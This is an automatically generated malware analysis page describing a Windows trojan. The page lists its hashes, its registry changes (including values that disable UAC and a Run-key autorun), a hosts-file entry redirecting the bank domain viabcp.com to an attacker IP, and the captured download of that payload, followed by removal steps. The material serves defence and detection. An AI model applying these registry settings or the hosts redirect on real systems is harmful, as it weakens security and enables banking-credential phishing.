Gen.Variant.Kazy.311402_3059beda9d

by malwarelabrobot on May 25th, 2014 in Malware Descriptions.

Gen:Variant.Kazy.311402 (BitDefender), Trojan.Win32.Generic.pak!cobra (VIPRE), Gen:Variant.Kazy.311402 (B) (Emsisoft), RDN/Qhost-Gen!y (McAfee), Gen:Variant.Kazy.311402 (FSecure), Dropper.Small.USI (AVG), Win32:Malware-gen (Avast), Gen:Variant.Kazy.311402 (AdAware)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 3059beda9d52aa1d56be4531b121ade7
SHA1: d9f0a5fb8ea61581ecdab896e705cb147907ae2a
SHA256: 725636f8156891c8eb38b1922381630e80cd3e3e0f1520ff97aba10263944a5f
SSDeep: 384:9IolQltVS0lbumJ21Lf4ZGDf00Tu8T0npzkneEi0x7rjSvChkNGC mCzYcHe m:9jlAtVaJS0TqpREp7CvCaNGzzYcHe m
Size: 33280 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2012-01-19 23:18:30
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

mscorsvw.exe:1912

The Trojan injects its code into the following process(es):

%original file name%.exe:1520

File activity

The process %original file name%.exe:1520 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\drivers\ms.doc (1 bytes)
%System%\drivers\winlogon.exe (33 bytes)
%System%\drivers\etc\hosts (1 bytes)

The Trojan deletes the following file(s):

%System%\drivers\ms.doc (0 bytes)

Registry activity

The process mscorsvw.exe:1912 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "1320000"

The process %original file name%.exe:1520 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\3059beda9d52aa1d56be4531b121ade7\DEBUG]
"Trace Level" = ""

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"ConsentPromptBehaviorAdmin" = "0"
"ValidateAdminCodeSignatures" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableInstallerDetection" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableUIADesktopToggle" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"FilterAdministratorToken" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B0 6E 9E 83 F4 A7 DE 69 BF BC 4A D5 E1 88 FE DD"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableSecureUIAPaths" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"windows Live Messenger" = "C:\Windows\System32\drivers\winlogon.exe"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\3059beda9d52aa1d56be4531b121ade7\DEBUG]
"Trace Level"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

The Trojan modifies the "%System%\drivers\etc\hosts" file, which maps host names to IP addresses before DNS is consulted.
The modified file is 1036 bytes in size. The following entries are added to the hosts file:

96.125.162.84 www.viabcp.com


Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: Integracion
Product Version: 1.0.0.0
Legal Copyright: Copyright (c) 2011
Legal Trademarks:
Original Filename: video.exe
Internal Name: video.exe
File Version: 1.0.0.0
File Description: Integracion
Comments:
Language: English (United Kingdom)

PE Sections

Name    Virtual Address  Virtual Size  Raw Size  Entropy   Section MD5
.text   8192             17476         17920     3.87333   181c50061ddd1c10e3bd1da47304dff6
.sdata  32768            96            512       0.958512  2d7e1b55dd59c6fd768965ea24fd03cd
.rsrc   40960            12920         13312     3.51263   e35cfaf69b18a95d4515afd584a6e3e9
.reloc  57344            12            512       0.056519  1d8002c2d964ef4c414564d004a446c9

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://hotelaziz.com/hotelreservation/install.txt
hxxp://www.hotelaziz.com/hotelreservation/install.txt 192.185.108.190


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /hotelreservation/install.txt HTTP/1.1
Host: VVV.hotelaziz.com


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 24 May 2014 05:52:17 GMT
Content-Type: text/plain
Content-Length: 1036
Connection: keep-alive
Last-Modified: Wed, 18 Jan 2012 19:49:12 GMT
Accept-Ranges: bytes
# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS
file used by Microsoft TCP/IP for Windows...#..# This file contains t
he mappings of IP addresses to host names. Each..# entry should be kep
t on an individual line. The IP address should..# be placed in the fir
st column followed by the corresponding host name...# The IP address a
nd the host name should be separated by at least one..# space...#..# A
dditionally, comments (such as these) may be inserted on individual..#
lines or following the machine name denoted by a '#' symbol...#..# Fo
r example:..#..# 102.54.94.97 rhino.acme.com # sourc
e server..# 38.25.63.10 x.acme.com # x client h
ost..# localhost name resolution is handled within DNS itself...#.127.
0.0.1 localhost..#.::1 localhost....................
............................................................96.125.162
.84 VVV.viabcp.com..96.125.162.84 viabcp.com..


GET /hotelreservation/install.txt HTTP/1.1
Host: VVV.hotelaziz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 24 May 2014 05:52:17 GMT
Content-Type: text/plain
Content-Length: 1036
Connection: keep-alive
Last-Modified: Wed, 18 Jan 2012 19:49:12 GMT
Accept-Ranges: bytes
# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS
file used by Microsoft TCP/IP for Windows...#..# This file contains t
he mappings of IP addresses to host names. Each..# entry should be kep
t on an individual line. The IP address should..# be placed in the fir
st column followed by the corresponding host name...# The IP address a
nd the host name should be separated by at least one..# space...#..# A
dditionally, comments (such as these) may be inserted on individual..#
lines or following the machine name denoted by a '#' symbol...#..# Fo
r example:..#..# 102.54.94.97 rhino.acme.com # sourc
e server..# 38.25.63.10 x.acme.com # x client h
ost..# localhost name resolution is handled within DNS itself...#.127.
0.0.1 localhost..#.::1 localhost....................
............................................................96.125.162
.84 VVV.viabcp.com..96.125.162.84 viabcp.com..


The Trojan connects to the servers at the following location(s):


Remove it with Ad-Aware

  1. Download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    mscorsvw.exe:1912

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %System%\drivers\ms.doc (1 bytes)
    %System%\drivers\winlogon.exe (33 bytes)
    %System%\drivers\etc\hosts (1 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "windows Live Messenger" = "C:\Windows\System32\drivers\winlogon.exe"

  5. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
    127.0.0.1 localhost
  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  7. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
